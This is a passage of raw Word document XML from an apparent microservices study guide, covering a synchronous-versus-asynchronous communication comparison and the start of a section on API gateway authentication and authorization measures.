            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45525B24"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Nature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="037F4FB8"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Blocking, request-response</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4621FEF0"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Non-blocking, event-driven</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00993446" w:rsidRPr="00DA2F32" w14:paraId="3B9997E7" w14:textId="77777777" w:rsidTr="00993446">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6861DE0E"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Coupling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D90A96A"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Tightly coupled</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01BFF152"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Loosely coupled</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00993446" w:rsidRPr="00DA2F32" w14:paraId="4E99A5CE" w14:textId="77777777" w:rsidTr="00993446">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E654CD8"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Latency Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F41AF5E"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Directly affects client performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75F18C20"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Reduced impact on client performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00993446" w:rsidRPr="00DA2F32" w14:paraId="2FDBA78E" w14:textId="77777777" w:rsidTr="00993446">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="777AA52D"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Scalability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="371FAB48"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Limited by the response time of services</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54FAAD6A"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Better scalability and handling of high volumes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00993446" w:rsidRPr="00DA2F32" w14:paraId="05FC7A07" w14:textId="77777777" w:rsidTr="00993446">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18B7C995"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Error Handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DBD082F"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Easier and more direct</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37EFCF9D"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More complex, requires additional mechanisms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00993446" w:rsidRPr="00DA2F32" w14:paraId="2045EA46" w14:textId="77777777" w:rsidTr="00993446">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41E216AA"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b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Use Cases</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="198C5379"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Real-time interactions, immediate feedback</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="376B0906" w14:textId="77777777" w:rsidR="00993446" w:rsidRPr="00DA2F32" w:rsidRDefault="00993446" w:rsidP="009E0607">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Background tasks, decoupled systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="353930A9" w14:textId="77777777" w:rsidR="00993446" w:rsidRPr="00DA2F32" w:rsidRDefault="00993446" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Choosing Between Synchronous and Asynchronous Communication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0C83D5" w14:textId="77777777" w:rsidR="00993446" w:rsidRPr="00DA2F32" w:rsidRDefault="00993446" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="332"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use Synchronous Communication</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712A644F" w14:textId="77777777" w:rsidR="00993446" w:rsidRPr="00DA2F32" w:rsidRDefault="00993446" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="332"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Immediate response is required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02571421" w14:textId="77777777" w:rsidR="00993446" w:rsidRPr="00DA2F32" w:rsidRDefault="00993446" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="332"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Operations need to be completed in a specific order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61ABD8FA" w14:textId="77777777" w:rsidR="00993446" w:rsidRPr="00DA2F32" w:rsidRDefault="00993446" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="332"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Simple request-response interactions are needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AFE85C" w14:textId="77777777" w:rsidR="00993446" w:rsidRPr="00DA2F32" w:rsidRDefault="00993446" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="332"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use Asynchronous Communication</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F71CD5E" w14:textId="77777777" w:rsidR="00993446" w:rsidRPr="00DA2F32" w:rsidRDefault="00993446" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="332"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Scalability and fault tolerance are important.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE04E9D" w14:textId="77777777" w:rsidR="00993446" w:rsidRPr="00DA2F32" w:rsidRDefault="00993446" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="332"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Decoupling services for better flexibility is desired.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2734B11B" w14:textId="77777777" w:rsidR="00993446" w:rsidRPr="00DA2F32" w:rsidRDefault="00993446" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="332"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Immediate response is not critical, and background processing is acceptable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6264F175" w14:textId="77777777" w:rsidR="0018537F" w:rsidRPr="00DA2F32" w:rsidRDefault="0018537F" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44ABEFDF" w14:textId="55900885" w:rsidR="00BB2F17" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="116" w:name="_Toc178383299"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What are the security measures that can be implemented for an API gateway in a microservices architecture.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="116"/>
    </w:p>
    <w:p w14:paraId="14D72227"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Securing an API gateway is crucial in a microservices architecture, as it serves as the entry point for all incoming traffic and manages communication between clients and backend services. Here are key security measures that can be implemented for an API gateway:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C45E9C4" w14:textId="77777777" w:rsidR="004E2604" w:rsidRPr="00DA2F32" w:rsidRDefault="004E2604" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1. Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4125D580"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Ensure that only authorized clients can access the API gateway.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637C6C69"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Measures</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3757DAFA" w14:textId="77777777" w:rsidR="004E2604" w:rsidRPr="00DA2F32" w:rsidRDefault="004E2604" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="333"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>API Keys</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use API keys to control access. Each client receives a unique key that must be included in requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407872B3" w14:textId="77777777" w:rsidR="004E2604" w:rsidRPr="00DA2F32" w:rsidRDefault="004E2604" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="333"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>OAuth 2.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Implement OAuth 2.0 for more robust authentication. It provides token-based access and supports various grant types (e.g., authorization code, client credentials).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D51A9C" w14:textId="77777777" w:rsidR="004E2604" w:rsidRPr="00DA2F32" w:rsidRDefault="004E2604" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="333"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JWT (JSON Web Tokens)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use JWTs for stateless authentication. Tokens are signed and can be verified to ensure authenticity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756ACDDA"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Implementation Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6815B7" w14:textId="77777777" w:rsidR="004E2604" w:rsidRPr="00DA2F32" w:rsidRDefault="004E2604" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="334"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>API Key Verification</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Check the presence and validity of API keys in request headers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D15C826" w14:textId="77777777" w:rsidR="004E2604" w:rsidRPr="00DA2F32" w:rsidRDefault="004E2604" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="334"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>OAuth 2.0 Integration</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Redirect users to an OAuth authorization server to obtain access tokens.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AC3C44" w14:textId="77777777" w:rsidR="004E2604" w:rsidRPr="00DA2F32" w:rsidRDefault="004E2604" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2. Authorization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7590A3BD"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Ensure that authenticated clients have the appropriate permissions to access resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E67BDA"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Measures</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2A2D24" w14:textId="77777777" w:rsidR="004E2604" w:rsidRPr="00DA2F32" w:rsidRDefault="004E2604" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="335"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Role-Based Access Control (RBAC)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Implement RBAC to manage access permissions based on user roles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66129AD6" w14:textId="77777777" w:rsidR="004E2604" w:rsidRPr="00DA2F32" w:rsidRDefault="004E2604" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="335"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Attribute-Based Access Control (ABAC)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use ABAC to define permissions based on attributes such as user identity, request context, or resource type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CAFEFF" w14:textId="77777777" w:rsidR="004E2604" w:rsidRPr="00DA2F32" w:rsidRDefault="004E2604" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="335"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Scopes and Claims</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
